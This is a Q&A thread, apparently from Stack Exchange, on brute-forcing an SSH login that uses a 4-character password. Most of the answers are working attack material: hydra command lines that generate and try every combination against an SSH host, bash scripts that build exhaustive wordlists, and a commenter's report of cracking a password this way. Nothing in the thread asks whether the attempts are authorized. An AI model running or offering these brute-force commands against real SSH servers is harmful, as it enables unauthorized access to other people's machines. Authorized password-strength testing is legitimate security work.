# Brute-force an SSH-login that has only a 4-letter password

Tags: ssh, brute-force

Suppose, you know that a certain computer is only protected by such a short password, then you could just try every possible combination easily.

How would a script look like, that tries to crack that password?

Something like

```
#!/bin/bash
wordlist=create_wordlist(); # external defined
for i in $(cat $wordlist); do
  echo ssh username@localhost pipe password $i here; 
done
```

*(I know, this is not a good example but my bash skills are not that good yet)*

Comment: As this is more bash, less security, I'd go over to super user.

Comment: If you just want a quick hack, use 4 nested loops that go from a-z, and concatenate the values together.

Comment: can't john the ripper connect to ssh server directly?

Answer (score 18, accepted):

`hydra` can generate the passwords for you. No need to generate them separately if you will be using brute force:

```
hydra -l user_name -V -x 4:4:aA1 ip_address ssh
```

-V means verbose, `-x 4:4:aA1` means min is 4 letters, max is 4 letters. List of letters is a-z denoted by a, A-Z denoted by A, 0-9 denoted by 1. You can add other characters like `%_-+/`

You need to wrap apostrophes around the -x option if you add special characters like space, ^,&,* or ":

```
hydra -t 128 -l user_name -V -x '4:4:aA1"@#$!()=`~?><;:%^&*_-+/,.\ ' localhost ssh
```

Comment: This doesn't give anything new that previous answers haven't.

Comment: It does, in fact this is the best answer, cause it doesent need to have a teporary wordlist file and works with just one line of code

Comment: I just successfully hacked a 1-letter password with `hydra -l testuser -V -x 1:4:aA1- localhost ssh` (1:4 means minimum 1 and maximum 4-letters)

Answer (score 11):

Whilst you could use a generic scripting language like bash for this, you might get better results with a security tool focused on testing brute-force attacks like [THC-Hydra](http://www.thc.org/thc-hydra/) from a speed perspective anyway.

Comment: ok, i followed that tutorial (http://insidetrust.blogspot.de/2011/08/using-hydra-to-dictionary-attack-web.html), but it doesent work: `echo myrealpassword>/tmp/pass.txt; hydra 10.0.0.74 ssh2 -s 22 -p /tmp/pass.txt -l ruben -e ns -t 10` sais `Error: Unknown service`

Comment: I tend to have better success with re-ordering the switches so that the commands ends with the target and service. Read the hydra man page and help text.

Comment: i found it: `hydra -l john -p doe 192.168.0.1 ssh` works, thanks

Answer (score 2):

so this is the conclusion:

```
nano /tmp/create_wordlist_case_sensitive.sh
```

---

```
#!/usr/bin/bash
letters="- . , _ "$(echo {0..9} {A..z})
run1=( `echo $(echo $letters) | sed 's/\[ \] \^ \_ \` //'` )
run2=( `echo $(echo $letters) | sed 's/\[ \] \^ \_ \` //'` )
run3=( `echo $(echo $letters) | sed 's/\[ \] \^ \_ \` //'` )
run4=( `echo $(echo $letters) | sed 's/\[ \] \^ \_ \` //'` )

echo '-'
for a in "${run1[@]}"
  do
  echo "$a"
  for b in "${run2[@]}"
    do
    echo "$a$b"
    for c in "${run3[@]}"
      do
      echo "$a$b$c"
        for d in "${run4[@]}"
        do
        echo "$a$b$c$d"
      done
    done
  done
done
```

---

```
bash /tmp/create_wordlist_case_sensitive.sh >/tmp/word_list_long.txt
```

---

```
hydra -l john -P /tmp/word_list_long.txt attack_host ssh
```

Answer (score 0):

here are two bash scripts to generate a list of all possible four letter combinations.  the first gives only lowercase combinations (`create_wordlist_case_insensitive.sh`), while the second gives all combinations of upper and lowercase letters (`create_wordlist_case_sensitive.sh`).

```
$ cat create_wordlist_case_insensitive.sh
#!/usr/bin/bash

for a in {a..z}
 do
  for b in {a..z}
   do
    for c in {a..z}
     do
      for d in {a..z}
       do
        echo "$a$b$c$d"
       done
     done
   done
 done


$ cat create_wordlist_case_sensitive.sh
#!/usr/bin/bash

run1=( `echo $(echo {A..z}) | sed 's/\[ \] \^ \_ \` //'` )
run2=( `echo $(echo {A..z}) | sed 's/\[ \] \^ \_ \` //'` )
run3=( `echo $(echo {A..z}) | sed 's/\[ \] \^ \_ \` //'` )
run4=( `echo $(echo {A..z}) | sed 's/\[ \] \^ \_ \` //'` )

for a in "${run1[@]}"
 do
  for b in "${run2[@]}"
   do
    for c in "${run3[@]}"
     do
      for d in "${run4[@]}"
       do
        echo "$a$b$c$d"
       done
     done
   done
 done
```

use them to create your wordlist files like this:

```
$ create_wordlist_case_insensitive.sh >word_list_short.txt
$ create_wordlist_case_sensitive.sh >word_list_long.txt
```

then your script can loop through whichever file you need like this:

```
$ cat forceit.sh
#!/usr/bin/bash

while read line
 do
  echo "Trying: $line"
  echo ssh intaudftp@file --password "$line" ## NOT REAL CODE
 done < word_list_short.txt
```

## except that this code won't really work, bc ssh doesn't accept a password as an argument.

you'd have to automate that segment of the code with `expect`, but i won't go into how to do that here.  alternatively, i suppose you could use a different command that does accept a password as an argument, like `telnet`.

Comment: I am totally unsure how this is helpful to anyone. The hard part isn't coming up with the combos, it's how to brute-force ssh, which is the detail you purposely omitted.

Comment: Thx, this is the correct answer to the question. it would work with some more coding (with `expect`). but `hydra` will get better results.

Comment: You can shorten your for loops to just one loop using `for a in {a..z}{a..z}{a..z}{a..z} ; do echo $a ; done`. This will echo from `aaaa` to `zzzz`.